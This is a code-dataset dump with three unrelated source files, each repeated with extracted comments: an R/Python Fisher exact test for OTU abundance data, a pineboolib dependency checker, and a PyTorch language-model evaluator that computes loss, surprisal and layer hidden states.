<reponame>tbj128/gene-expression-analyzer<gh_stars>0 # =========================================== # # mian Analysis Data Mining/ML Library # @author: tbj128 # # =========================================== # # Imports # # # ======== R specific setup ========= # import rpy2.robjects as robjects import rpy2.rlike.container as rlc from rpy2.robjects.packages import SignatureTranslatedAnonymousPackage import rpy2.robjects.numpy2ri rpy2.robjects.numpy2ri.activate() from gene.model.otu_table import OTUTable class FisherExact(object): r = robjects.r rcode = """ fisher_exact <- function(base, groups, cat2, cat1, minthreshold) { if (ncol(base) <= 0) { return(matrix(,0,7)) } cat1OTUs = base[groups == cat1,, drop=FALSE]; cat2OTUs = base[groups == cat2,, drop=FALSE]; results = matrix(,ncol(cat1OTUs),7) results = data.frame(results) colnames(results) = c("P-Value", "Q-Value", "Cat1 Present", "Cat1 Total", "Cat2 Present", "Cat2 Total") rownames(results) = colnames(cat1OTUs) for (i in 1:ncol(cat1OTUs)) { fisherMatrix = matrix(,2,2); fisherMatrix[1, 1] = sum(cat2OTUs[,i] > minthreshold); fisherMatrix[1, 2] = sum(cat2OTUs[,i] <= minthreshold); fisherMatrix[2, 1] = sum(cat1OTUs[,i] > minthreshold); fisherMatrix[2, 2] = sum(cat1OTUs[,i] <= minthreshold); totalSumCat1 = fisherMatrix[2, 1] + fisherMatrix[2, 2] totalSumCat2 = fisherMatrix[1, 1] + fisherMatrix[1, 2] ftest = fisher.test(fisherMatrix); results[i,1] = colnames(cat1OTUs)[i] results[i,2] = ftest$p.value results[i,3] = 1 results[i,4] = fisherMatrix[1, 1] results[i,5] = totalSumCat2 - fisherMatrix[1, 1] results[i,6] = fisherMatrix[2, 1] results[i,7] = totalSumCat1 - fisherMatrix[2, 1] } results[,3] = p.adjust(results[,2], method = "fdr"); # Sorts the table according to the (p-val) column results = results[order(results[,2]),] return(results) } """ rStats = SignatureTranslatedAnonymousPackage(rcode, "rStats") def run(self, user_request): table = OTUTable(user_request.user_id, user_request.pid) otu_table, headers, sample_labels = 
table.get_table_after_filtering_and_aggregation(user_request) metadata_vals = table.get_sample_metadata().get_metadata_column_table_order(sample_labels, user_request.catvar) taxonomy_map = table.get_otu_metadata().get_taxonomy_map() return self.analyse(user_request, otu_table, headers, metadata_vals, taxonomy_map) def analyse(self, user_request, otuTable, headers, metaVals, taxonomy_map): otu_to_genus = {} if int(user_request.level) == -1: # We want to display a short hint for the OTU using the genus (column 5) for header in headers: if header in taxonomy_map and len(taxonomy_map[header]) > 5: otu_to_genus[header] = taxonomy_map[header][5] else: otu_to_genus[header] = "" groups = robjects.FactorVector(robjects.StrVector(metaVals)) # Forms an OTU only table (without IDs) allOTUs = [] col = 0 while col < len(otuTable[0]): allOTUs.append((headers[col], otuTable[:, col])) col += 1 od = rlc.OrdDict(allOTUs) dataf = robjects.DataFrame(od) catVar1 = user_request.get_custom_attr("pwVar1") catVar2 = user_request.get_custom_attr("pwVar2") minthreshold = user_request.get_custom_attr("minthreshold") fisherResults = self.rStats.fisher_exact(dataf, groups, catVar1, catVar2, int(minthreshold)) hints = {} results = [] i = 1 while i <= fisherResults.nrow: newRow = [] j = 1 while j <= fisherResults.ncol: if j > 1: newRow.append(round(float(fisherResults.rx(i, j)[0]), 6)) else: newRow.append(str(fisherResults.rx(i, j)[0])) j += 1 otu = newRow[0] if int(user_request.level) == -1: hints[otu] = otu_to_genus[otu] i += 1 results.append(newRow) cat1 = catVar1 cat2 = catVar2 abundancesObj = {} abundancesObj["results"] = results abundancesObj["hints"] = hints abundancesObj["cat1"] = cat1 abundancesObj["cat2"] = cat2 return abundancesObj
# =========================================== # # mian Analysis Data Mining/ML Library # @author: tbj128 # # =========================================== # # Imports # # # ======== R specific setup ========= # import rpy2.robjects as robjects import rpy2.rlike.container as rlc from rpy2.robjects.packages import SignatureTranslatedAnonymousPackage import rpy2.robjects.numpy2ri rpy2.robjects.numpy2ri.activate() from gene.model.otu_table import OTUTable class FisherExact(object): r = robjects.r rcode = """ fisher_exact <- function(base, groups, cat2, cat1, minthreshold) { if (ncol(base) <= 0) { return(matrix(,0,7)) } cat1OTUs = base[groups == cat1,, drop=FALSE]; cat2OTUs = base[groups == cat2,, drop=FALSE]; results = matrix(,ncol(cat1OTUs),7) results = data.frame(results) colnames(results) = c("P-Value", "Q-Value", "Cat1 Present", "Cat1 Total", "Cat2 Present", "Cat2 Total") rownames(results) = colnames(cat1OTUs) for (i in 1:ncol(cat1OTUs)) { fisherMatrix = matrix(,2,2); fisherMatrix[1, 1] = sum(cat2OTUs[,i] > minthreshold); fisherMatrix[1, 2] = sum(cat2OTUs[,i] <= minthreshold); fisherMatrix[2, 1] = sum(cat1OTUs[,i] > minthreshold); fisherMatrix[2, 2] = sum(cat1OTUs[,i] <= minthreshold); totalSumCat1 = fisherMatrix[2, 1] + fisherMatrix[2, 2] totalSumCat2 = fisherMatrix[1, 1] + fisherMatrix[1, 2] ftest = fisher.test(fisherMatrix); results[i,1] = colnames(cat1OTUs)[i] results[i,2] = ftest$p.value results[i,3] = 1 results[i,4] = fisherMatrix[1, 1] results[i,5] = totalSumCat2 - fisherMatrix[1, 1] results[i,6] = fisherMatrix[2, 1] results[i,7] = totalSumCat1 - fisherMatrix[2, 1] } results[,3] = p.adjust(results[,2], method = "fdr"); # Sorts the table according to the (p-val) column results = results[order(results[,2]),] return(results) } """ rStats = SignatureTranslatedAnonymousPackage(rcode, "rStats") def run(self, user_request): table = OTUTable(user_request.user_id, user_request.pid) otu_table, headers, sample_labels = 
table.get_table_after_filtering_and_aggregation(user_request) metadata_vals = table.get_sample_metadata().get_metadata_column_table_order(sample_labels, user_request.catvar) taxonomy_map = table.get_otu_metadata().get_taxonomy_map() return self.analyse(user_request, otu_table, headers, metadata_vals, taxonomy_map) def analyse(self, user_request, otuTable, headers, metaVals, taxonomy_map): otu_to_genus = {} if int(user_request.level) == -1: # We want to display a short hint for the OTU using the genus (column 5) for header in headers: if header in taxonomy_map and len(taxonomy_map[header]) > 5: otu_to_genus[header] = taxonomy_map[header][5] else: otu_to_genus[header] = "" groups = robjects.FactorVector(robjects.StrVector(metaVals)) # Forms an OTU only table (without IDs) allOTUs = [] col = 0 while col < len(otuTable[0]): allOTUs.append((headers[col], otuTable[:, col])) col += 1 od = rlc.OrdDict(allOTUs) dataf = robjects.DataFrame(od) catVar1 = user_request.get_custom_attr("pwVar1") catVar2 = user_request.get_custom_attr("pwVar2") minthreshold = user_request.get_custom_attr("minthreshold") fisherResults = self.rStats.fisher_exact(dataf, groups, catVar1, catVar2, int(minthreshold)) hints = {} results = [] i = 1 while i <= fisherResults.nrow: newRow = [] j = 1 while j <= fisherResults.ncol: if j > 1: newRow.append(round(float(fisherResults.rx(i, j)[0]), 6)) else: newRow.append(str(fisherResults.rx(i, j)[0])) j += 1 otu = newRow[0] if int(user_request.level) == -1: hints[otu] = otu_to_genus[otu] i += 1 results.append(newRow) cat1 = catVar1 cat2 = catVar2 abundancesObj = {} abundancesObj["results"] = results abundancesObj["hints"] = hints abundancesObj["cat1"] = cat1 abundancesObj["cat2"] = cat2 return abundancesObj
en
0.448911
# =========================================== # # mian Analysis Data Mining/ML Library # @author: tbj128 # # =========================================== # # Imports # # # ======== R specific setup ========= # fisher_exact <- function(base, groups, cat2, cat1, minthreshold) { if (ncol(base) <= 0) { return(matrix(,0,7)) } cat1OTUs = base[groups == cat1,, drop=FALSE]; cat2OTUs = base[groups == cat2,, drop=FALSE]; results = matrix(,ncol(cat1OTUs),7) results = data.frame(results) colnames(results) = c("P-Value", "Q-Value", "Cat1 Present", "Cat1 Total", "Cat2 Present", "Cat2 Total") rownames(results) = colnames(cat1OTUs) for (i in 1:ncol(cat1OTUs)) { fisherMatrix = matrix(,2,2); fisherMatrix[1, 1] = sum(cat2OTUs[,i] > minthreshold); fisherMatrix[1, 2] = sum(cat2OTUs[,i] <= minthreshold); fisherMatrix[2, 1] = sum(cat1OTUs[,i] > minthreshold); fisherMatrix[2, 2] = sum(cat1OTUs[,i] <= minthreshold); totalSumCat1 = fisherMatrix[2, 1] + fisherMatrix[2, 2] totalSumCat2 = fisherMatrix[1, 1] + fisherMatrix[1, 2] ftest = fisher.test(fisherMatrix); results[i,1] = colnames(cat1OTUs)[i] results[i,2] = ftest$p.value results[i,3] = 1 results[i,4] = fisherMatrix[1, 1] results[i,5] = totalSumCat2 - fisherMatrix[1, 1] results[i,6] = fisherMatrix[2, 1] results[i,7] = totalSumCat1 - fisherMatrix[2, 1] } results[,3] = p.adjust(results[,2], method = "fdr"); # Sorts the table according to the (p-val) column results = results[order(results[,2]),] return(results) } # We want to display a short hint for the OTU using the genus (column 5) # Forms an OTU only table (without IDs)
2.188932
2
pineboolib/application/utils/check_dependencies.py
deavid/pineboo
2
6627865
<gh_stars>1-10 # -*- coding: utf-8 -*- """Check the application dependencies.""" import sys from pineboolib.core.utils import logging from pineboolib.core.utils.utils_base import is_deployed from pineboolib.core.utils.check_dependencies import get_dependency_errors from pineboolib.core.utils.check_dependencies import DependencyCheck, DependencyError from pineboolib.application import project logger = logging.getLogger(__name__) def check_dependencies(dict_: DependencyCheck, exit: bool = True) -> bool: """ Check if a package is installed and return the result. @param dict_. Dict with the name of the agency and the module to be checked. @param exit . Exit if dependence fails. """ dep_error: DependencyError = get_dependency_errors(dict_) if not dep_error: return True msg = "" logger.debug("Error trying to import modules:\n%s", "\n\n".join(dep_error.values())) logger.warning("Unmet dependences:") for (dep, suggestedpkg), errormsg in dep_error.items(): logger.warning("Install package %s for %s", suggestedpkg, dep) msg += "Instale el paquete %s.\n%s" % (suggestedpkg, errormsg) if dep == "pyfpdf": msg += "\n\n\n Use pip3 install -i https://test.pypi.org/simple/ pyfpdf==1.7.3" if exit: if project.DGI.useDesktop() and project.DGI.localDesktop(): from pineboolib.qt3_widgets.messagebox import MessageBox MessageBox.warning(None, "Pineboo - Dependencias Incumplidas -", msg, MessageBox.Ok) if not is_deployed(): sys.exit(32) return False
# -*- coding: utf-8 -*- """Check the application dependencies.""" import sys from pineboolib.core.utils import logging from pineboolib.core.utils.utils_base import is_deployed from pineboolib.core.utils.check_dependencies import get_dependency_errors from pineboolib.core.utils.check_dependencies import DependencyCheck, DependencyError from pineboolib.application import project logger = logging.getLogger(__name__) def check_dependencies(dict_: DependencyCheck, exit: bool = True) -> bool: """ Check if a package is installed and return the result. @param dict_. Dict with the name of the agency and the module to be checked. @param exit . Exit if dependence fails. """ dep_error: DependencyError = get_dependency_errors(dict_) if not dep_error: return True msg = "" logger.debug("Error trying to import modules:\n%s", "\n\n".join(dep_error.values())) logger.warning("Unmet dependences:") for (dep, suggestedpkg), errormsg in dep_error.items(): logger.warning("Install package %s for %s", suggestedpkg, dep) msg += "Instale el paquete %s.\n%s" % (suggestedpkg, errormsg) if dep == "pyfpdf": msg += "\n\n\n Use pip3 install -i https://test.pypi.org/simple/ pyfpdf==1.7.3" if exit: if project.DGI.useDesktop() and project.DGI.localDesktop(): from pineboolib.qt3_widgets.messagebox import MessageBox MessageBox.warning(None, "Pineboo - Dependencias Incumplidas -", msg, MessageBox.Ok) if not is_deployed(): sys.exit(32) return False
en
0.734964
# -*- coding: utf-8 -*- Check the application dependencies. Check if a package is installed and return the result. @param dict_. Dict with the name of the agency and the module to be checked. @param exit . Exit if dependence fails.
2.179031
2
lm/evaluator.py
aistairc/lm_syntax_negative
3
6627866
import torch from lm_trainer import TokenNegLossCalculator import utils class Evaluator(object): def __init__(self, pad_id): self.pad_id = pad_id class DocumentEvaluator(Evaluator): def __init__(self, bptt, pad_id): super().__init__(pad_id) self.bptt = bptt def evaluate(self, model, batch_gen): device = next(model.parameters()).device # Turn on evaluation mode which disables dropout. model.rnn.eval() total_loss = 0 ntokens = model.vocab.size hidden = model.rnn.init_hidden(batch_gen.batch_size) for data, targets in batch_gen.for_eval(): data = data.to(device) targets = targets.to(device) output, hidden = model.rnn(data, hidden) total_loss += data.size(1) * model.loss(output, targets).item() hidden = utils.repackage_hidden(hidden) return total_loss / batch_gen.data.size(1) class SentenceEvaluator(Evaluator): def __init__(self, pad_id, neg_loss_calculator=None, exclude=[]): """exclude: excluded token index. exclude=[0, -1, -2] means excluding first, last tokens, and eos. """ super().__init__(pad_id) if neg_loss_calculator: self.neg_loss_calculator = neg_loss_calculator # neg_loss_calculator should only be used during training. # exclude, on the other hand, should only be used for testing. 
assert len(exclude) == 0 self.exclude = exclude def evaluate(self, model, batch_gen): with torch.no_grad(): return self._evaluate(model, batch_gen) def _evaluate(self, model, batch_gen): device = next(model.parameters()).device model.eval() all_tokens = 0 total_cross_entropy_loss = 0.0 total_margin_loss = 0.0 total_correct = 0 total_margin_sents = 0 for batch in batch_gen.for_eval(): if len(batch) == 3 or len(batch) == 4: if len(batch) == 3: sources, lengths, targets = batch ent_loss = self._cross_entropy_loss( model, sources, lengths, targets, device) else: sources, lengths, targets, negatives = batch ent_loss, margin_loss = self._cross_entropy_token_neg_loss( model, sources, lengths, targets, negatives, device) total_margin_loss += margin_loss if len(self.exclude) > 0: nexclude = len(self.exclude) non_zero = sum([max(0, l - nexclude) for l in lengths]).item() else: non_zero = lengths.sum().item() all_tokens += non_zero total_cross_entropy_loss += ent_loss * non_zero else: margin_loss, _, _ = self.neg_loss_calculator.loss(model, batch) total_margin_loss += margin_loss.item() * len(batch[0]) # margin_loss, n_correct = self._margin_loss(model, batch, device) # total_margin_loss += margin_loss * len(batch[0]) # total_correct += n_correct # total_margin_sents += len(batch[0]) total_loss = total_cross_entropy_loss + total_margin_loss avg_loss = total_cross_entropy_loss / all_tokens agreement_accuracy = total_correct / total_margin_sents \ if total_margin_sents > 0 else 0 return total_loss, avg_loss, total_margin_loss, agreement_accuracy def _cross_entropy_loss(self, model, sources, lengths, targets, device): sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) output, _ = model.rnn(sources, input_lengths = lengths) targets = self._mask_targets_by_exlude(targets, lengths) return model.loss(output, targets).item() def _cross_entropy_token_neg_loss( self, model, sources, lengths, targets, negatives, device): assert 
isinstance(self.neg_loss_calculator, TokenNegLossCalculator) sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) output, _ = model.rnn(sources, input_lengths = lengths) raw_loss = model.loss(output, targets, reduce=False) unlikelihood_loss = self.neg_loss_calculator.loss( model, output, targets, negatives, sources.size(1)) unlikelihood_sum = unlikelihood_loss.sum() ntokens = lengths.sum() ent_avg = raw_loss.sum() / ntokens return (ent_avg.item(), unlikelihood_sum.item()) def _mask_targets_by_exlude(self, targets, lengths): if len(self.exclude) == 0: return targets maxlen = lengths.max() offset = 0 for l in lengths: for e in self.exclude: if e >= 0: idx = offset + e else: idx = offset + l + e targets[idx] = self.pad_id offset += maxlen return targets # def _margin_loss(self, model, batch, device): # assert self.margin_criterion is not None # gold_srcs, lengths, gold_tgts, wrong_srcs, wrong_tgts = batch # gold_srcs = gold_srcs.to(device) # lengths = lengths.to(device) # gold_tgts = gold_tgts.to(device) # wrong_srcs = wrong_srcs.to(device) # wrong_tgts = wrong_tgts.to(device) # gold_outputs, _ = model.rnn(gold_srcs, input_lengths = lengths, return_h = False) # wrong_outputs, _ = model.rnn(wrong_srcs, input_lengths = lengths, return_h = False) # gold_probs = model.loss(gold_outputs, gold_tgts, reduce=False) * -1.0 # (total_length, 1) # wrong_probs = model.loss(wrong_outputs, wrong_tgts, reduce=False) * -1.0 # # We first decompose *_probs into sentences using `lengths`. 
# gold_sent_probs = gold_probs.new_zeros(lengths.size(0)) # wrong_sent_probs = gold_probs.new_zeros(lengths.size(0)) # offset = 0 # for i, l in enumerate(lengths): # gold_sent_probs[i] = gold_probs[offset:offset+l].sum() # wrong_sent_probs[i] = wrong_probs[offset:offset+l].sum() # offset += l # assert offset == lengths.sum() # gold_sent_probs = gold_sent_probs.unsqueeze(1) # wrong_sent_probs = wrong_sent_probs.unsqueeze(1) # probs = torch.cat((gold_sent_probs, wrong_sent_probs), 1) # targets = gold_sent_probs.new_zeros(gold_sent_probs.size(0), dtype=torch.long) # n_correct = len([p for p in probs if p[0] > p[1]]) # return self.margin_criterion(probs, targets).item(), n_correct def word_stats(self, model, tensors, pad_id = None, calc_entropy = True): '''Given a list of sentences (word ids), calculate two stats: surprisals and entropys. Input tensors are *unsorted* sentences. This internally sorts the input first, for batch processing. After obtaining stats for sorted inputs, then, this returns the stats for each sentence after recovering the original sentence order. 
''' if not pad_id: pad_id = self.pad_id device = next(model.parameters()).device # batch_size = 100 model.eval() sources, lengths, targets, perm_idx, reverse_idx = ( self._sources_to_sorted_tensors(tensors, device, pad_id)) output, _ = model.rnn(sources, input_lengths = lengths) output = output.detach() surps = model.loss(output, targets, reduce=False).detach() surps = surps.squeeze(1) entropys = model.entropy(output).detach() if calc_entropy else None list_surps = [] list_ents = [] offset = 0 for j in range(len(lengths)): idx = j l = lengths[j].item() sent_surps = surps[offset:offset+l].cpu().numpy() list_surps.append(sent_surps) if calc_entropy: sent_ents = entropys[offset:offset+l].cpu().numpy() list_ents.append(sent_ents) offset += l list_surps = [list_surps[i] for i in reverse_idx] if calc_entropy: list_ents = [list_ents[i] for i in reverse_idx] else: list_ents = list_surps return (list_surps, list_ents) def _sources_to_sorted_tensors(self, tensors, device, pad_id): lengths = torch.tensor([len(s)-1 for s in tensors]) lengths, perm_idx = lengths.sort(0, descending=True) sources = [tensors[i] for i in perm_idx] sources, lengths, targets = utils.get_sorted_sentences_batch( sources, 0, len(tensors), pad_id, sorted=True) sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) reverse_idx = [0] * len(perm_idx) for i, order in enumerate(perm_idx): reverse_idx[order] = i return sources, lengths, targets, perm_idx, reverse_idx def get_layer_hiddens(self, model, tensors, pad_id = None, only_top_layer = False, context = [0]): # 0 means w_t, -1 means w_{t-1} """Run RNN on the in puts, and obtain a sequence of numpy arrays of the size [ndarray(num_layers, sequence_length, representation_dim)]. 
""" if not pad_id: pad_id = self.pad_id device = next(model.parameters()).device # batch_size = 100 model.eval() sources, lengths, targets, perm_idx, reverse_idx = ( self._sources_to_sorted_tensors(tensors, device, pad_id)) _, _, outputs, _ = model.rnn(sources, input_lengths = lengths, return_h=True) # outputs is a list of tensors. Each tensor corresponds to one layer, and has # the size of (seq_len, batch_size, hidden_size). # (batch_size, seq_len, hidden_size), probably? outputs = [output.detach() for output in outputs] hidden_arrays = [] # Single element list means that the only layer is the top layer. layers = [len(outputs)-1] if only_top_layer else list(range(len(outputs))) max_layer_dim = max([outputs[layer].size(2) for layer in layers]) for i, length in enumerate(lengths): def layer_to_array(layer): context_array = [] current_emb_dim = outputs[layer].size(2) if current_emb_dim < max_layer_dim: remain_size = max_layer_dim - current_emb_dim # Our LSTMs may have different hidden dim for each layer. # This method makes dimensions of all layers the same, by filling 0 # for smaller dim layer. def may_expand(emb): return torch.cat([emb, emb.new_zeros(emb.size(0), remain_size)], 1) else: # If dim of this layer is maximum, do nothing. def may_expand(emb): return emb for c in context: # "1+c:1+c+length-1" means that index 1 is offset. Index 1 # corresponds to encoding of the first token (0 corresponds to BOS). layer_output = outputs[layer][i,1+c:1+c+length-1,:] layer_output = may_expand(layer_output) context_array.append(layer_output) array = torch.cat(context_array, -1).unsqueeze(0) return array arrays = [layer_to_array(layer) for layer in layers] array = torch.cat(arrays, 0).cpu().numpy() # array = torch.cat(arrays, 0) # print(array.size()) # array = array.cpu().numpy() hidden_arrays.append(array) hidden_arrays = [hidden_arrays[i] for i in reverse_idx] return hidden_arrays
import torch from lm_trainer import TokenNegLossCalculator import utils class Evaluator(object): def __init__(self, pad_id): self.pad_id = pad_id class DocumentEvaluator(Evaluator): def __init__(self, bptt, pad_id): super().__init__(pad_id) self.bptt = bptt def evaluate(self, model, batch_gen): device = next(model.parameters()).device # Turn on evaluation mode which disables dropout. model.rnn.eval() total_loss = 0 ntokens = model.vocab.size hidden = model.rnn.init_hidden(batch_gen.batch_size) for data, targets in batch_gen.for_eval(): data = data.to(device) targets = targets.to(device) output, hidden = model.rnn(data, hidden) total_loss += data.size(1) * model.loss(output, targets).item() hidden = utils.repackage_hidden(hidden) return total_loss / batch_gen.data.size(1) class SentenceEvaluator(Evaluator): def __init__(self, pad_id, neg_loss_calculator=None, exclude=[]): """exclude: excluded token index. exclude=[0, -1, -2] means excluding first, last tokens, and eos. """ super().__init__(pad_id) if neg_loss_calculator: self.neg_loss_calculator = neg_loss_calculator # neg_loss_calculator should only be used during training. # exclude, on the other hand, should only be used for testing. 
assert len(exclude) == 0 self.exclude = exclude def evaluate(self, model, batch_gen): with torch.no_grad(): return self._evaluate(model, batch_gen) def _evaluate(self, model, batch_gen): device = next(model.parameters()).device model.eval() all_tokens = 0 total_cross_entropy_loss = 0.0 total_margin_loss = 0.0 total_correct = 0 total_margin_sents = 0 for batch in batch_gen.for_eval(): if len(batch) == 3 or len(batch) == 4: if len(batch) == 3: sources, lengths, targets = batch ent_loss = self._cross_entropy_loss( model, sources, lengths, targets, device) else: sources, lengths, targets, negatives = batch ent_loss, margin_loss = self._cross_entropy_token_neg_loss( model, sources, lengths, targets, negatives, device) total_margin_loss += margin_loss if len(self.exclude) > 0: nexclude = len(self.exclude) non_zero = sum([max(0, l - nexclude) for l in lengths]).item() else: non_zero = lengths.sum().item() all_tokens += non_zero total_cross_entropy_loss += ent_loss * non_zero else: margin_loss, _, _ = self.neg_loss_calculator.loss(model, batch) total_margin_loss += margin_loss.item() * len(batch[0]) # margin_loss, n_correct = self._margin_loss(model, batch, device) # total_margin_loss += margin_loss * len(batch[0]) # total_correct += n_correct # total_margin_sents += len(batch[0]) total_loss = total_cross_entropy_loss + total_margin_loss avg_loss = total_cross_entropy_loss / all_tokens agreement_accuracy = total_correct / total_margin_sents \ if total_margin_sents > 0 else 0 return total_loss, avg_loss, total_margin_loss, agreement_accuracy def _cross_entropy_loss(self, model, sources, lengths, targets, device): sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) output, _ = model.rnn(sources, input_lengths = lengths) targets = self._mask_targets_by_exlude(targets, lengths) return model.loss(output, targets).item() def _cross_entropy_token_neg_loss( self, model, sources, lengths, targets, negatives, device): assert 
isinstance(self.neg_loss_calculator, TokenNegLossCalculator) sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) output, _ = model.rnn(sources, input_lengths = lengths) raw_loss = model.loss(output, targets, reduce=False) unlikelihood_loss = self.neg_loss_calculator.loss( model, output, targets, negatives, sources.size(1)) unlikelihood_sum = unlikelihood_loss.sum() ntokens = lengths.sum() ent_avg = raw_loss.sum() / ntokens return (ent_avg.item(), unlikelihood_sum.item()) def _mask_targets_by_exlude(self, targets, lengths): if len(self.exclude) == 0: return targets maxlen = lengths.max() offset = 0 for l in lengths: for e in self.exclude: if e >= 0: idx = offset + e else: idx = offset + l + e targets[idx] = self.pad_id offset += maxlen return targets # def _margin_loss(self, model, batch, device): # assert self.margin_criterion is not None # gold_srcs, lengths, gold_tgts, wrong_srcs, wrong_tgts = batch # gold_srcs = gold_srcs.to(device) # lengths = lengths.to(device) # gold_tgts = gold_tgts.to(device) # wrong_srcs = wrong_srcs.to(device) # wrong_tgts = wrong_tgts.to(device) # gold_outputs, _ = model.rnn(gold_srcs, input_lengths = lengths, return_h = False) # wrong_outputs, _ = model.rnn(wrong_srcs, input_lengths = lengths, return_h = False) # gold_probs = model.loss(gold_outputs, gold_tgts, reduce=False) * -1.0 # (total_length, 1) # wrong_probs = model.loss(wrong_outputs, wrong_tgts, reduce=False) * -1.0 # # We first decompose *_probs into sentences using `lengths`. 
# gold_sent_probs = gold_probs.new_zeros(lengths.size(0)) # wrong_sent_probs = gold_probs.new_zeros(lengths.size(0)) # offset = 0 # for i, l in enumerate(lengths): # gold_sent_probs[i] = gold_probs[offset:offset+l].sum() # wrong_sent_probs[i] = wrong_probs[offset:offset+l].sum() # offset += l # assert offset == lengths.sum() # gold_sent_probs = gold_sent_probs.unsqueeze(1) # wrong_sent_probs = wrong_sent_probs.unsqueeze(1) # probs = torch.cat((gold_sent_probs, wrong_sent_probs), 1) # targets = gold_sent_probs.new_zeros(gold_sent_probs.size(0), dtype=torch.long) # n_correct = len([p for p in probs if p[0] > p[1]]) # return self.margin_criterion(probs, targets).item(), n_correct def word_stats(self, model, tensors, pad_id = None, calc_entropy = True): '''Given a list of sentences (word ids), calculate two stats: surprisals and entropys. Input tensors are *unsorted* sentences. This internally sorts the input first, for batch processing. After obtaining stats for sorted inputs, then, this returns the stats for each sentence after recovering the original sentence order. 
''' if not pad_id: pad_id = self.pad_id device = next(model.parameters()).device # batch_size = 100 model.eval() sources, lengths, targets, perm_idx, reverse_idx = ( self._sources_to_sorted_tensors(tensors, device, pad_id)) output, _ = model.rnn(sources, input_lengths = lengths) output = output.detach() surps = model.loss(output, targets, reduce=False).detach() surps = surps.squeeze(1) entropys = model.entropy(output).detach() if calc_entropy else None list_surps = [] list_ents = [] offset = 0 for j in range(len(lengths)): idx = j l = lengths[j].item() sent_surps = surps[offset:offset+l].cpu().numpy() list_surps.append(sent_surps) if calc_entropy: sent_ents = entropys[offset:offset+l].cpu().numpy() list_ents.append(sent_ents) offset += l list_surps = [list_surps[i] for i in reverse_idx] if calc_entropy: list_ents = [list_ents[i] for i in reverse_idx] else: list_ents = list_surps return (list_surps, list_ents) def _sources_to_sorted_tensors(self, tensors, device, pad_id): lengths = torch.tensor([len(s)-1 for s in tensors]) lengths, perm_idx = lengths.sort(0, descending=True) sources = [tensors[i] for i in perm_idx] sources, lengths, targets = utils.get_sorted_sentences_batch( sources, 0, len(tensors), pad_id, sorted=True) sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) reverse_idx = [0] * len(perm_idx) for i, order in enumerate(perm_idx): reverse_idx[order] = i return sources, lengths, targets, perm_idx, reverse_idx def get_layer_hiddens(self, model, tensors, pad_id = None, only_top_layer = False, context = [0]): # 0 means w_t, -1 means w_{t-1} """Run RNN on the in puts, and obtain a sequence of numpy arrays of the size [ndarray(num_layers, sequence_length, representation_dim)]. 
""" if not pad_id: pad_id = self.pad_id device = next(model.parameters()).device # batch_size = 100 model.eval() sources, lengths, targets, perm_idx, reverse_idx = ( self._sources_to_sorted_tensors(tensors, device, pad_id)) _, _, outputs, _ = model.rnn(sources, input_lengths = lengths, return_h=True) # outputs is a list of tensors. Each tensor corresponds to one layer, and has # the size of (seq_len, batch_size, hidden_size). # (batch_size, seq_len, hidden_size), probably? outputs = [output.detach() for output in outputs] hidden_arrays = [] # Single element list means that the only layer is the top layer. layers = [len(outputs)-1] if only_top_layer else list(range(len(outputs))) max_layer_dim = max([outputs[layer].size(2) for layer in layers]) for i, length in enumerate(lengths): def layer_to_array(layer): context_array = [] current_emb_dim = outputs[layer].size(2) if current_emb_dim < max_layer_dim: remain_size = max_layer_dim - current_emb_dim # Our LSTMs may have different hidden dim for each layer. # This method makes dimensions of all layers the same, by filling 0 # for smaller dim layer. def may_expand(emb): return torch.cat([emb, emb.new_zeros(emb.size(0), remain_size)], 1) else: # If dim of this layer is maximum, do nothing. def may_expand(emb): return emb for c in context: # "1+c:1+c+length-1" means that index 1 is offset. Index 1 # corresponds to encoding of the first token (0 corresponds to BOS). layer_output = outputs[layer][i,1+c:1+c+length-1,:] layer_output = may_expand(layer_output) context_array.append(layer_output) array = torch.cat(context_array, -1).unsqueeze(0) return array arrays = [layer_to_array(layer) for layer in layers] array = torch.cat(arrays, 0).cpu().numpy() # array = torch.cat(arrays, 0) # print(array.size()) # array = array.cpu().numpy() hidden_arrays.append(array) hidden_arrays = [hidden_arrays[i] for i in reverse_idx] return hidden_arrays
en
0.691408
# Turn on evaluation mode which disables dropout. exclude: excluded token index. exclude=[0, -1, -2] means excluding first, last tokens, and eos. # neg_loss_calculator should only be used during training. # exclude, on the other hand, should only be used for testing. # margin_loss, n_correct = self._margin_loss(model, batch, device) # total_margin_loss += margin_loss * len(batch[0]) # total_correct += n_correct # total_margin_sents += len(batch[0]) # def _margin_loss(self, model, batch, device): # assert self.margin_criterion is not None # gold_srcs, lengths, gold_tgts, wrong_srcs, wrong_tgts = batch # gold_srcs = gold_srcs.to(device) # lengths = lengths.to(device) # gold_tgts = gold_tgts.to(device) # wrong_srcs = wrong_srcs.to(device) # wrong_tgts = wrong_tgts.to(device) # gold_outputs, _ = model.rnn(gold_srcs, input_lengths = lengths, return_h = False) # wrong_outputs, _ = model.rnn(wrong_srcs, input_lengths = lengths, return_h = False) # gold_probs = model.loss(gold_outputs, gold_tgts, reduce=False) * -1.0 # (total_length, 1) # wrong_probs = model.loss(wrong_outputs, wrong_tgts, reduce=False) * -1.0 # # We first decompose *_probs into sentences using `lengths`. # gold_sent_probs = gold_probs.new_zeros(lengths.size(0)) # wrong_sent_probs = gold_probs.new_zeros(lengths.size(0)) # offset = 0 # for i, l in enumerate(lengths): # gold_sent_probs[i] = gold_probs[offset:offset+l].sum() # wrong_sent_probs[i] = wrong_probs[offset:offset+l].sum() # offset += l # assert offset == lengths.sum() # gold_sent_probs = gold_sent_probs.unsqueeze(1) # wrong_sent_probs = wrong_sent_probs.unsqueeze(1) # probs = torch.cat((gold_sent_probs, wrong_sent_probs), 1) # targets = gold_sent_probs.new_zeros(gold_sent_probs.size(0), dtype=torch.long) # n_correct = len([p for p in probs if p[0] > p[1]]) # return self.margin_criterion(probs, targets).item(), n_correct Given a list of sentences (word ids), calculate two stats: surprisals and entropys. Input tensors are *unsorted* sentences. 
